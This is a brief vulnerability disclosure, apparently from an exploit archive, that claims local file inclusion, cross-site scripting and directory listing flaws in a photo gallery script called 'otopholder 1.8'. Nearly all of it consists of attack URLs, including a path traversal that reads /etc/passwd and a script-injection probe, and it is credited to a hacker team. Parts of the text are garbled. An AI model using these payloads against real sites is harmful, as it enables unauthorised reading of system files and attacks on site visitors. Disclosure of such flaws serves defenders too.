otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
vendor: http://www.jakeo.com vuln : http://host/foto/index.php?path=../../etc/passwd http://host/foto/index.php?path=bxss/b http://host/foto/index.php?path=../../directory listing Author : Vampire [email protected] Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran HackerZ Security Team...